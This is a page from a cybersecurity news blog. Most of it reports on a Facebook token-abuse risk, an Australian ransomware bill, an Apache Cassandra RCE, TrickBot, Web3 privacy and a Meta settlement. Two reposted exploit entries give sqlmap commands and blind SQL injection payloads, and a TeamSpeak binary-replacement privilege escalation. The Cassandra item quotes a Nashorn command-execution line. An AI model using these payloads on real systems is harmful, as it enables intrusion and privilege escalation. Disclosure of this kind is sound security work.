Sunday, January 19, 2025
Home Blog Page 47

Facebook is one Chrome Extension away from another Privacy Scandal

By
Steven Black (n0tst3)
-
0

Multiple Chrome browser extensions make use of a session token for Meta’s Facebook that grants access to signed-in users’ social network data in a way that violates the company’s policies and leaves users open to potential privacy violations.

Security researcher Zach Edwards last week noted that Brave had blocked a Chrome extension called L.O.C. out of concern it exposed the user’s Facebook data to a third-party server without any notice or permission prompt.

L.O.C. utilized an access token that can be easily obtained from Facebook’s Creator Studio web app. After extracting this token – a text string composed of 192 letters and numbers – from the app, the browser extension is able to use it with Facebook’s Graph API without being an approved third-party Facebook app to fetch data about the signed-in user.

It does so, its developer says, to allow users to automate the processing of their Facebook data.

The problem is that data access of this sort could be abused, as it has been in the past. An extension utilizing this token could, for example, copy the user’s data and send it to a remote server without the user’s knowledge or consent. Or it could store the user’s name and email and use that for tracking the individual across websites.

Here’s how a theoretical data theft could easily occur:

  1. You create and release a seemingly innocent Chrome extension that can fetch access tokens from Facebook’s Creator Studio.
  2. Whenever a victim installs your Chrome extension and is signed into Facebook, the extension obtains one of these tokens on the victim’s behalf to silently access their Facebook data via the social network’s Graph API.
  3. The extension then exfiltrates the victim’s data to a remote server.

The ability to grab an access token from the Creator Studio provides a route for extensions to quietly, automatically harvest signed-in users’ profile data without permission and without having to, say, scrape pages.

The access token is obtained by fetching this page and extracting accessToken from the source.

In September 2018, Facebook acknowledged a security issue affecting almost 50 million accounts, which it attributed to miscreants stealing access tokens presented by its “View As” feature to allow people to see how their profiles look to others.

“This allowed them to steal Facebook access tokens which they could then use to take over people’s accounts,” explained Guy Rosen, who was VP of Product Management at the time and is now VP of Integrity at Meta. “Access tokens are the equivalent of digital keys that keep people logged in to Facebook so they don’t need to re-enter their password every time they use the app.”

The access token available through Creator Studio does not pose the same threat of account takeover as the “View As” token.

A Meta spokesperson told us via email that these sorts of tokens have legitimate uses and provide no access to data beyond what’s available to an individual account holder. And Meta said there’s no indication that the L.O.C. extension has been exfiltrating information from people’s devices. Nonetheless, the token does provide programmatic access to data about signed-in Facebook users without authorization or consent.

It was this risk that prompted browser maker Brave to block the L.O.C. extension, until developer Loc Mai contacted Brave’s development team. A Brave spokesperson said the company is working with the programmer to make some changes – likely a notification or permission prompt – so the extension is acceptable from a privacy and security standpoint.

And it’s a risk that ought to concern Meta and its subsidiaries given Facebook’s 2019 settlement of an FTC investigation that followed from the Cambridge Analytica scandal. As part of that deal, Facebook committed to limiting third-party access to user data.

Cambridge Analytica obtained people’s Facebook profile information via a third-party quiz app that plugged into the social network. There are parallels here: you hope that a quiz app won’t share your Facebook profile info with others, and you hope a Chrome extension avoids that, too.

Though Facebook vowed to put in place measures to prevent another Cambridge Analytica fiasco, the Creators Studio access tokens in the hands of a malicious and widely installed Chrome extension could lead to a repeat of history.

“Under the new framework required by the FTC, we’ll be accountable and transparent about fixing old products that don’t work the way they should and building new products to a higher standard,” Facebook insisted when it promised to clean up data access nearly three years ago.

We’re dealing with it, sort of

In an email to The Register, a Meta spokesperson said the company is dealing with these extensions but that requires the help of Google.

“The access tokens that these extensions request help creators and others to use our tools and products but aren’t capable of accessing data beyond what people can do with their own account or what the session cookie on their browser already provides,” Meta’s spokesperson said in an email.

“Since installing browser extensions can carry risk, we regularly report ones that violate our policies to browser makers like Google to have them removed, as we did in this case. This work is managed by our dedicated External Data Misuse team that focuses on detecting, blocking, and deterring improper automated use of our services.”

Part of the issue is that Google’s Chrome extensions are easy to subvert or misuse and Meta doesn’t have a direct way to prevent the publication of extensions that abuse its Graph API, apart from reporting the issue to Google.

Meta’s spokesperson said that the Creator Studio token is scoped to the user’s session, which means it will expire if the extension user logs out of Facebook. And if the token has not been transmitted to the extension developer’s server, as appears to be the case with the L.O.C. extension, then uninstalling the extension will also cause the token to expire.

The token, we’re told, is not the problem. Rather browser extensions allow users to automate Facebook activities. Meta’s spokesperson advised people to be cautious when installing extensions and said browser makers like Google need to be vigilant and remove unsafe extensions from their web stores.

Edwards told The Register that this is a weird problem because if someone can be convinced to install one of these extensions, that trust could be easily abused. Facebook, he said, isn’t providing any notice to users based on the data permissions they’ve granted, which differs from the notice and authorization prompts that follow from permitted programmatic interaction with the social network.

So far, no action has been taken, and according to Edwards, there are several Chrome extensions at least that similarly co-opt the Creator Studio access token to allow data to be fetched via the Facebook Graph API.

J2TEAM Security (200K users), MonokaiToolkit (10K users), FBVN (80,000 users), and KB2A Tool (50,000 users) all utilize this token, according to Edwards. He explained these all appear to have come out of a Facebook group frequented by Vietnamese-speaking developers who hunt Facebook tokens, ostensibly to provide services the social network doesn’t offer.

The Register has no reason to believe these developers are misusing user data. In fact, J2TEAM Security purports to block Facebook phishing URLs. It is entirely possible to use Facebook’s access token to promote security rather than harm it.

But the fact that this group of developers can access Facebook users’ data through the Graph API in ways that violate Facebook rules – and has been doing so at least since 2017 – shows there is a gap between having rules and enforcing them.

Meta insists it is dealing with these extensions and pointed to its External Data Misuse efforts. The internet giant’s spokesperson reiterated that the company regularly takes action to enforce its policies and noted that Facebook previously sent a cease and desist letter to the developer of the L.O.C. extension and banned him from the platform – though that’s done nothing to disable the extension.

We’re told Meta has made another request to Google to remove the extension from its Chrome Web Store and is looking at the other extensions mentioned above.

Even so, abuse of these sorts of tokens looks likely to continue because Meta says they have legitimate use cases, like enabling access to its Creator Studio app and supporting functionality like Recent Posts in the Creator Home tab.

You may also enjoy reading, CVEs You May Have Missed While Log4J Stole The Headlines

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
Please login to bookmarkClose

AU: Hackers face 25 years’ jail for ransomware attacks on critical infrastructure

By
Steven Black (n0tst3)
-
0

Cryptocurrency seizure in the bill, plus other new offences.

Hackers will face up to 25 years’ jail for deliberately targeting critical infrastructure assets under proposed changes to Australia’s computer offences designed to stem the rise in ransomware attacks against businesses.

The new laws will also give federal police “clear legal authority” to investigate and prosecute gangs operating offshore, and the ability to seize cryptocurrencies and other digital assets during the course of an investigation.

The proposed amendments are contained in the Crimes Legislation Amendment (Ransomware Action Plan) Bill 2020 introduced to parliament by assistant minister to the minister for industry, energy and emission reduction Tim Wilson on Thursday morning.

The bill delivers the federal government’s ransomware action plan, which proposed a suite of new offences for stealing data and the buying and selling of malware, to better protect businesses from attacks.

The action plan, released in October, also foreshadows a mandatory ransomware incident reporting regime that will apply to businesses with a turnover of $10 million or more each year, though that proposal does not form part of the bill.

It follows attempts by the federal opposition to create a similar reporting scheme as part of a private members bill introduced by shadow assistant minister for cyber security Tim Watts in June 2021.

Introducing the bill on behalf of home affairs minister Karen Andrews, Wilson said the amendments are a “critical step to deter ransomware gangs, enable a more effective law enforcement response and halt the flow of cryptocurrencies”.

“This bill modernises Australia’s computer offences to ensure ransomware gangs face criminal liability for each aspect of their business model and increases penalties for their egregious conduct,” he said.

If passed, the bill will allow law enforcement agencies to “investigate and prosecute [computer] offences under the… Criminal Code where the conduct occurs outside of Australia but impacts persons in Australia”.

Wilson said the new power would “provide the Australian Government clear legal authority to investigate and prosecute criminals targeting Australians and Australian businesses regardless of their location”.

The bill creates several new offences targeting cyber criminals, including an “aggravated offence” for any person who commits a computer offence against critical infrastructure, which is intended to work hand-in-hand with reforms to critical infrastructure security.

Actions intended to “cause an impact, whether direct or indirect, on the availability, integrity or reliability of a critical infrastructure asset or on the confidentiality of information about or stored in, or confidentiality of the critical infrastructure asset” will be considered an offence.

The offence carries a maximum penalty of 25 years in prison, which the explanatory memorandum states “appropriately reflects the catastrophic risk posed by cyber attacks that utilise ransomware or malware to cause harm to critical infrastructure”.

A new aggravated offence is also created for buyers and sellers of ransomware, which is intended to target the ransomware business model, particularly “ransomware-as-a-service” or any commissions paid by threat actors.

The bill also introduces a new offence that “criminalises all forms of extortion in relation to a victim of a computer offence”, regardless of “whether or not the person has caused the unauthorised access, modification or impairment of data”.

“This ensures that groups of individuals or criminal syndicates face criminal liability where individuals comprising the group perform specific roles,” the explanatory memorandum states, adding that the offence carries a maximum penalty of 10 years’ prison.

Other changes include increases to the maximum penalty for unauthorised access to, or modification of, restricted data and unauthorised impairment of data held on a computer disk from two years to five years – the first time this has been amended since 2001.

In addition to the new offences, the bill “extends current investigative and freezing powers that cover financial institutions to certain digital currency exchanges” and establishes a legal basis for police to seize cryptocurrency and other digital assets under a warrant.

Wilson said this change “reflects the way criminals are using cryptocurrency as part of their criminal activities” and would allow law enforcement to continue to “effectively detect, disrupt and deter activities harmful to Australians”.

Debate on the bill was adjourned to a later date.

You may also enjoy reading, CVEs You May Have Missed While Log4J Stole The Headlines

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
Please login to bookmarkClose

Experts disclose details of Apache Cassandra RCE

By
Steven Black (n0tst3)
-
0
vulnerability

Researchers disclose a now-patched remote code execution (RCE) vulnerability in the Apache Cassandra database software.

JFrog researchers publicly disclosed details of a now-patched high-severity security vulnerability (CVE-2021-44521) in Apache Cassandra database software that could be exploited by remote attackers to achieve code execution on affected installations.

Apache Cassandra is an open-source NoSQL distributed database used by thousands of companies.

“JFrog’s Security Research team recently disclosed an RCE (remote code execution) issue in Apache Cassandra, which has been assigned to CVE-2021-44521 (CVSS 8.4).” reads the analsyis published by JFrog. “This Apache security vulnerability is easy to exploit and has the potential to wreak havoc on systems, but luckily only manifests in non-default configurations of Cassandra.”

Cassandra offers the functionality of creating user-defined-functions (UDFs) that allow to perform custom processing of data in the database.

Admins can use Java and JavaScript to write UDFs. In JavaScript it leverages the Nashorn engine in the Java Runtime Environment (JRE) which is not guaranteed to be secure when accepting untrusted code

JFrog researchers that discovered that when the configuration for user-defined functions (UDFs) are enabled, threat actors could leverage the Nashorn engine to escape the sandbox and achieve remote code execution.

“For example, running the following Nashorn JavaScript code allows execution of an arbitrary shell command –

java.lang.Runtime.getRuntime().exec("touch hacked")

Cassandra’s development team decided to implement a custom sandbox around the UDF execution which uses two mechanisms to restrict the UDF code” states the report.

Experts noticed that the exploitation is possible when the cassandra.yaml configuration file contains the following definitions:

  • enable_user_defined_functions: true
  • enable_scripted_user_defined_functions: true
  • enable_user_defined_functions_threads: false

“When the option is set to false, all invoked UDF functions run in the Cassandra daemon thread, which has a security manager with some permissions. We will show how to abuse these permissions to achieve sandbox escape and RCE.” continues the analysis.

Experts shared a PoC to create a new file named “hacked” on the Cassandra server

Apache released versions 3.0.263.11.12, and 4.0.2 to address the vulnerability, it adds a new flag “allow_extra_insecure_udfs” that’s set to false by default, it prevents turning off the security manager and blocks access to java.lang.System..

You may also enjoy reading, CVEs You May Have Missed While Log4J Stole The Headlines

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
Please login to bookmarkClose

TrickBot developers continue to refine the malware’s sneakiness and power

By
Steven Black (n0tst3)
-
0
malware

The versatile malware known as TrickBot continues to pose “great danger” to customers of financial and technology companies because its developers are trying to stay a step ahead of cybersecurity analysts, according to Check Point Research.

The company says TrickBot’s authors have equipped it with layers of “anti-analysis” and “anti-deobfuscation” capabilities, meaning that if an expert tries to pick apart the malware’s code, it stops communicating with its command-and-control servers or stops working altogether. Those features “show the authors’ highly technical background and explain why Trickbot remains a very prevalent malware family,” Check Point says in research published Wednesday.

The danger remains clear, too: Check Point says the various modules of TrickBot are often deployed for stealing login credentials from customers of several large banks, including Bank of America and Wells Fargo, as well as big tech firms like Microsoft and Amazon. About 60 companies are affected overall. “These brands are not the victims but their customers might be the targets,” Check Point says.

One of TrickBot’s strengths is its ability to perpetuate itself — a feature that established its early reputation as botnet software. Check Point’s latest research shows how the malware’s developers have branched out, and with purpose. TrickBot has been linked to Russian origins, but Check Point doesn’t speculate on where the code might be coming from now.

The developers “have the skills to approach malware development from a very low-level and pay attention to small details. … At the same time, we know that the operators behind the infrastructure are very experienced with malware development on a high-level as well,” says Alexander Chailytko, the cybersecurity, research and innovation manager at Check Point. “The combination of these two factors is what allows Trickbot to remain a dangerous threat for more than 5 years already.”

Israel-based Check Point noted in December 2021 that TrickBot had bounced back despite operations by Microsoft and U.S. Cyber Command that stunted it before the 2020 U.S. elections. Not only had the company identified at least 140,000 new victims, as of late last year, but the malware also was helping to revive the Emotet botnet.

Since the 2020 takedown, TrickBot’s developers have updated a “web injection” module that captures emails and passwords from unsuspecting website users, Check Point says. The report also identifies code that captures and spreads credentials in part by using techniques with names familiar to cybersecurity researchers: Mimikatz and EternalRomance. Another module steals credentials from applications like popular web browsers, email programs, FTP clients and VPN providers, Check Point says.

TrickBot has more than 20 modules overall, and they “allow the execution of all kinds of malicious activities” will posing “great danger” to the data and potentially the bank accounts of victims, Check Point says.

One of Trickbot’s alleged developers, Vladimir Dunaev, was extradited to the U.S. last year on charges of computer fraud, bank fraud, wire fraud, money laundering and identity theft.

You may also enjoy reading, CVEs You May Have Missed While Log4J Stole The Headlines

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
Please login to bookmarkClose

Multi-Vendor Online Groceries Management System 1.0 – ‘id’ Blind SQL Injection

By
Steven Black (n0tst3)
-
0
# Exploit Title: Multi-Vendor Online Groceries Management System 1.0 - 'id' Blind SQL Injection
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15166/multi-vendor-online-groceries-management-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: XAMPP, Windows 10


# Vulnerable Code

line 2 in file "mvogms/products/view_product.php

$qry = $conn->query("SELECT  p.*, v.shop_name as vendor, c.name as `category` FROM `product_list` p inner join vendor_list v on p.vendor_id = v.id inner join category_list c on p.category_id = c.id where p.delete_flag = 0 and p.id = '{$_GET['id']}'");

# Sqlmap command:

sqlmap -u 'localhost/mvogms/?page=products/view_product&id=3' -p id --level=5 --risk=3 --dbs --random-agent --eta --batch

# Output:

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: page=products/view_product&id=3' AND 9973=9973-- ogag

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=products/view_product&id=3' AND (SELECT 2002 FROM (SELECT(SLEEP(5)))anjK)-- glsQ
Bookmark
Please login to bookmarkClose

TeamSpeak 3.5.6 Vuln – Insecure File Permissions

By
Steven Black (n0tst3)
-
0
# Exploit Title: TeamSpeak 3.5.6 - Insecure File Permissions

# Exploit Author: Aryan Chehreghani
# Contact: aryanchehreghani@yahoo[.]com
# Vendor Homepage: https://www[.]teamspeak.com
# Software Link: https://www[.]teamspeak.com/en/downloads
# Version: 3.5.6 
# Tested on: Windows 10 x64

# [ About - TeamSpeak ]:
#TeamSpeak (TS) is a proprietary voice-over-Internet Protocol (VoIP),
#application for audio communication between users on a chat channel,
#much like a telephone conference call, Users typically use headphones with a microphone,
#The client software connects to a TeamSpeak server of the user's choice from which the user may join chat channels,
#The target audience for TeamSpeak is gamers, who can use the software to communicate,
#with other players on the same team of a multiplayer video game,
#Communicating by voice gives a competitive advantage by enabling players to keep their hands on the controls.

# [ Description ]:
#The TeamSpeak Application was installed with insecure file permissions.
#It was found that all folder and file permissions were incorrectly configured during installation.
#It was possible to replace the service binary. 

# [ POC ]:

C:\Users\user\AppData\Local\TeamSpeak 3 Client>icacls *.exe

createfileassoc.exe NT AUTHORITY\SYSTEM:(F)
                    BUILTIN\Administrators:(F)
                    WIN-FREMP1UB3LB\Administrator:(F)

error_report.exe NT AUTHORITY\SYSTEM:(F)
                 BUILTIN\Administrators:(F)
                 WIN-FREMP1UB3LB\Administrator:(F)

package_inst.exe NT AUTHORITY\SYSTEM:(F)
                 BUILTIN\Administrators:(F)
                 WIN-FREMP1UB3LB\Administrator:(F)

QtWebEngineProcess.exe NT AUTHORITY\SYSTEM:(F)
                       BUILTIN\Administrators:(F)
                       WIN-FREMP1UB3LB\Administrator:(F)

ts3client_win32.exe NT AUTHORITY\SYSTEM:(F)
                    BUILTIN\Administrators:(F)
                    WIN-FREMP1UB3LB\Administrator:(F)

Uninstall.exe NT AUTHORITY\SYSTEM:(F)
              BUILTIN\Administrators:(F)
              WIN-FREMP1UB3LB\Administrator:(F)

update.exe NT AUTHORITY\SYSTEM:(F)
           BUILTIN\Administrators:(F)
           WIN-FREMP1UB3LB\Administrator:(F)

Successfully processed 7 files; Failed processing 0 files

# [ Exploit - Privilege Escalation ]:
#Replace ts3client_win32.exe,update.exe,package_inst.exe,QtWebEngineProcess.exe,createfileassoc.exe and other ...
#with any executable malicious file you want then wait and get SYSTEM or Administrator rights (Privilege Escalation)
Bookmark
Please login to bookmarkClose

High-Severity RCE Security Bug Reported in Apache Cassandra Database Software

By
Steven Black (n0tst3)
-
0

Researchers have revealed details of a now-patched high-severity security vulnerability in Apache Cassandra that, if left unaddressed, could be abused to gain remote code execution (RCE) on affected installations.

“This Apache security vulnerability is easy to exploit and has the potential to wreak havoc on systems, but luckily only manifests in non-default configurations of Cassandra,” Omer Kaspi, security researcher at DevOps firm JFrog, said in a technical write-up published Tuesday.

How To Fix the ACE Vulnerability In Adobe After Effects CVE-2022-23200
How to fix the Ace Vulnerability in Adobe After Effects

Apache Cassandra is an open-source, distributed, NoSQL database management system for managing very large amounts of structured data across commodity servers.

Tracked as CVE-2021-44521 (CVSS score: 8.4), the vulnerability concerns a specific scenario where the configuration for user-defined functions (UDFs) are enabled, effectively allowing an attacker to leverage the Nashorn JavaScript engine, escape the sandbox, and achieve execution of untrusted code.

Specifically, it was found that Cassandra deployments are vulnerable to CVE-2021-44521 when the cassandra.yaml configuration file contains the following definitions:

  • enable_user_defined_functions: true
  • enable_scripted_user_defined_functions: true
  • enable_user_defined_functions_threads: false

“When the [enable_user_defined_functions_threads] option is set to false, all invoked UDF functions run in the Cassandra daemon thread, which has a security manager with some permissions,” Kaspi said, thereby allowing the adversary to disable the security manager and break out of the sandbox and run arbitrary shell commands on the server.

Apache Cassandra users are encouraged to upgrade to versions 3.0.263.11.12, and 4.0.2 to avoid possible exploitation, which addresses the flaw by adding a new flag “allow_extra_insecure_udfs” that’s set to false by default and prevents turning off the security manager.

You may also enjoy reading, CVEs You May Have Missed While Log4J Stole The Headlines

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
Please login to bookmarkClose

Why Web3 isn’t the privacy panacea we think it is

By
Steven Black (n0tst3)
-
2
  • Running on blockchain, Web3 is expected to revolutionize the internet by changing the ownership and power of private data to the users.
  • Some experts reckon due to its lack of central control and access to data, Web3 could make it even more difficult to police cybercrime.

The Internet that most of us are a part of today is known as the Web2 — a place where we are beholden to centralized entities who control the flow of information while monopolizing and profiting off our data. The era of Web2, as some claim, may soon come to an end as we have recently reached the critical juncture of a newer, more decentralized internet known as the Web3.

The term Web3 or Web 3.0 has been garnering much of the online world’s attention lately. While it is not something new, it is at its core, the future of the internet that promotes decentralized concepts mainly to reduce dependency on Big Tech like Meta, Google and Amazon. In fact, last month, Opera had launched a beta version of its “Crypto Browser Project”  — an internet browser with built-in Web3 integrations.

Proponents argue that web3 will improve user privacy by putting individuals in control of their data, via distributed personal data stores. But critics say that the transparent nature of public distributed ledgers, which make transactions visible to all participants, is antithetical to privacy.

The duality of Web3: Privacy or transparency? 

For starters, the term Web3 was first coined by Gavin Wood eight years ago. In a 2014 blog post, Wood reckoned how “entrusting our information to organizations in general is a fundamentally broken model.” He basically sold the idea that the future of the internet is a place where ownership and power are more widely and evenly distributed. 

To be precise, Wood’s vision is based on transparent digital ledgers known as blockchains — the technology that underpins cryptocurrencies — and with that, ‘Big Tech’ companies will be rivaled by more democratized forms of internet governance, where the user will get a say. “Web 3.0, or as might be termed the “post-Snowden” web, is a re-imagination of the sorts of things we already use the web for, but with a fundamentally different model for the interactions between parties,” he said.

Elaborating further on this, he added, “Information that we assume to be public, we publish. Information we assume to be agreed upon, we place on a consensus ledger. Information that we assume to be private, we keep secret and never reveal. Communication always takes place over encrypted channels and only with pseudonymous identities as endpoints; never with anything traceable (such as IP addresses).”

In short, Web3 promises to release us from the shackles of tech giants by enabling everyone to access data living on the blockchain. While it is certainly appealing that institutions no longer have the power to hold our data hostage, it is still important to consider: what does the public and transparent nature of web3 mean for our privacy?

To some, like the Private blockchain The Secrecy Network’s co-founder Tor Bair, “Web3 requires you to give up privacy entirely. NFTs and blockchains are all public-by-default and terrible for ownership and security.” 

Separately, according to a blog posting by the National University of Singapore (NUS), data security concerns are not eliminated completely with Web3. “Security issues on the next Internet phase go beyond data. For example, transacting anonymously on distributed ledgers currently comes with risks such as smart contract logic hacks and the lack of legal protection when things go wrong,” it said.

When it comes to the privacy legislation perspective, decentralization simply makes it difficult to identify the personally identifiable information (PII) controller and the PII processor, NUS believes. “Due to its lack of central control and access to data, Web 3.0 could make it even more difficult to police cybercrime, including online harassment, hate speech and child abuse images,” the blog posting reads.

NUS reckons regulators, businesses, and even consumers alike will have to start rethinking about how cybersecurity and privacy issues are handled through the lens of Web3–to keep pace with the evolving landscape.

Suggest an edit to this article

Go to Cybersecurity Knowledge Base

Got to the Latest Cybersecurity News

Go to Cybersecurity Academy

Go to Homepage

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for our Weekly Cybersecurity Newsletter Today.

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
Please login to bookmarkClose

Google Offering $91,000 Rewards for Linux Kernel, GKE Zero-Days

By
Steven Black (n0tst3)
-
0
google

Technology giant Google is offering bigger cash awards for hackers reporting critical security flaws affecting the Linux Kernel, GKE, Kubernetes, and kCTF.

In November last year, Google tripled the bug bounty rewards for Linux kernel flaws reported through its Vulnerability Rewards Program (VRP), for payouts of up to $50,337 for zero-day issues.

This week, the company announced it is nearly doubling that amount and offering a maximum reward of $91,337 for exploits that meet certain criteria. The maximum payout includes a base reward and three bonuses.

The base reward for the first exploit submitted for a certain vulnerability is $31,337, with no reward being offered for duplicate exploits.

Google Patches Zero-Day Vulnerability attack vector Actively Exploiting Chrome
RELATED READING

However, the search advertising giant is offering a bonus of $20,000 for zero-day security bugs (paid for the first valid exploit), another $20,000 bonus for vulnerabilities that do not require unprivileged user namespaces (paid for the first valid exploit), and a third $20,000 bonus for exploits using novel exploit techniques (paid for duplicate exploits too).

The new rewards structure also offers participating researchers the possibility to earn as much as $71,337 for 1-day exploits, and at least $20,000 for duplicate exploits that use novel techniques.

However, Google said it would also limit the number of rewards for 1days to only one per version/build.  “There are 12-18 GKE releases per year on each channel, and we have two clusters on different channels, so we will pay the 31,337 USD base rewards up to 36 times (no limit for the bonuses).”

The company recommends that researchers test their exploits in their own kCTF clusters, to make sure that no other participants to the VRP will access the exploit. 

Furthermore, the company says that, moving forward, zero-day submissions no longer have to include a flag at first, that reports for 1-day should include links to patches, and that the same form can be used to submit both exploits and flags.

“If you had submitted an exploit checksum for a 0day, please make sure that you include the original exploit as well as the final exploit and make sure to submit it within a week after the patch is merged on mainline,” Google added.

The company is now using a cluster for the REGULAR release channel and another for the RAPID release channel, to provide bug hunters with increased flexibility.

Since launching the expansion of kCTF VRP in November 2021, Google received nine vulnerability submissions — including five zero-days and two 1-days — and paid more than $175,000 in bug bounty rewards.

Bookmark
Please login to bookmarkClose

Meta Agrees $90M Settlement in Facebook Privacy Suit

By
Steven Black (n0tst3)
-
0

Facebook-parent Meta has agreed to pay $90 million to settle a 10-year-old lawsuit accusing it of tracking users online even after they logged off the social network, court records show.

The agreement was filed Monday in a California court and if approved by a judge would put to rest one of the series of suits alleging the social media giant invaded users’ privacy.

“Reaching a settlement in this case, which is more than a decade old, is in the best interest of our community and our shareholders and we’re glad to move past this issue,” Meta spokesperson Drew Pusateri told AFP.

The suit alleged the social media giant violated privacy guidelines by tracking its users’ visits to outside web pages that contained Facebook “like” buttons in order to better target ads.

That tracking contradicted assurances given by Facebook at the time, according to court filings.

The suit, which consolidated state and federal litigation, represented people who had active Facebook accounts between early 2010 and late 2011.

Facebook was able to tell when someone loaded a page embedded with its content, such as a “like” button, and could link the data back to users’ profiles, according to legal filings.

The issue raised in the suit was addressed and is not impacting Facebook users, according to the social network.

The proposed settlement calls for Meta to pay $90 million into a claims fund and delete all data the suit argued was wrongly collected.

Meta and other US internet giants are in the crosshairs of privacy advocates, users and regulators regarding how they use people’s data and software “cookies” that track online behavior.

You may also enjoy reading, CVEs You May Have Missed While Log4J Stole The Headlines

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
Please login to bookmarkClose
1...464748...79Page 47 of 79

Editor Picks

Featured

Cyber Academy

ABOUT US

RiSec represents an autonomous, non-profit alliance comprising of individuals dedicated to enhancing cybersecurity awareness and education. Read more

Contact us: security@realinfosec.net

Social

Subscribe for weekly updates

Copyright © RiSec 2023 All rights reserved.
All trademarks, logos, images and brand names are the property of their respective owners.